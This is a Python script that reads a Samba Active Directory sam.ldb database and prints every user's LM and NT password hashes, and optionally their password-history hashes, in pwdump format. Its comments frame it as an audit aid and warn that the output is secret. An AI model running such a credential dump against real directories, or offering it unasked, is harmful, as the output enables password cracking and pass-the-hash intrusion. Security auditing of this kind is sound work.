|
- #!/usr/bin/env python
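def get_history(attr, r):
    """Return the hashes held in history attribute *attr* of record *r*.

    The first value of the attribute is read as a run of 16-byte entries and
    each entry is returned as a lowercase hex string, in stored order.  A
    record that lacks the attribute yields an empty list.  A trailing chunk
    shorter than 16 bytes is still returned (as a shorter hex string) rather
    than rejected.

    The returned strings are credential material: keep them out of logs,
    tickets and world-readable files.
    """
    if attr not in r:
        return []
    blob = r[attr][0]
    # binascii.hexlify replaces the original str.encode('hex'), a codec that
    # exists only on Python 2; hexlify gives the same digits on Python 2 and 3.
    return [binascii.hexlify(blob[i:i + 16]).decode('ascii')
            for i in range(0, len(blob), 16)]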
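def get_hash(attr, r):
    """Return the first value of attribute *attr* in record *r* as hex.

    Returns the empty string when the record has no such attribute, which is
    what lets the caller print an empty field for a hash that is not stored.

    The returned string is credential material: keep it out of logs, tickets
    and world-readable files.
    """
    if attr not in r:
        return ''
    # binascii.hexlify replaces the original str.encode('hex'), a codec that
    # exists only on Python 2; hexlify gives the same digits on Python 2 and 3.
    return binascii.hexlify(r[attr][0]).decode('ascii')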
import binascii
from sys import argv, exit

from ldb import Ldb
from samba.dcerpc import security
from samba.ndr import ndr_unpack
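# Expect the database path, optionally followed by the literal '-history'.
if len(argv) not in (2, 3):
    print('Usage: %s <path to .ldb> [-history]' % argv[0])
    print("Exmpl: %s '/var/lib/samba/private/sam.ldb.d/DC=SECURUS,DC=CORP,DC=COM.ldb'" % argv[0])
    exit(2)

# The flag is only honoured as the second argument; any other third argument
# is silently ignored, exactly as before.
want_history = len(argv) == 3 and argv[2] == '-history'

# Every line printed below carries password hashes for a directory account.
# Treat the output as secret: do not redirect it to shared or world-readable
# locations, and remove it once the audit that needed it is finished.
for r in Ldb(argv[1]).search(expression='(objectclass=user)'):
    # dom_sid.split() is indexed with [-1] to obtain the account's RID.
    rid = ndr_unpack(security.dom_sid, r['objectSid'][0]).split()[-1]
    username = r['sAMAccountName']
    lmhash = get_hash('dBCSPwd', r)
    nthash = get_hash('unicodePwd', r)
    print('%s:%s:%s:%s:::' % (username, rid, lmhash, nthash))

    if want_history:
        # [1:] skips the first history entry -- presumably because it repeats
        # the current hash already printed above; confirm against the schema.
        lm_prev = get_history('lmPwdHistory', r)[1:]
        nt_prev = get_history('ntPwdHistory', r)[1:]

        # The original paired the lists with a two-iterable map(), which pads
        # the shorter list on Python 2 but stops at the shorter one on
        # Python 3, silently dropping history when only one attribute is
        # populated.  Pad both lists explicitly so each entry is printed,
        # with an empty field for the missing side.
        count = max(len(lm_prev), len(nt_prev))
        lm_prev += [''] * (count - len(lm_prev))
        nt_prev += [''] * (count - len(nt_prev))

        for i, (lm_old, nt_old) in enumerate(zip(lm_prev, nt_prev)):
            print('%s_history%d:%s:%s:%s:::' % (username, i, rid, lm_old, nt_old))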
|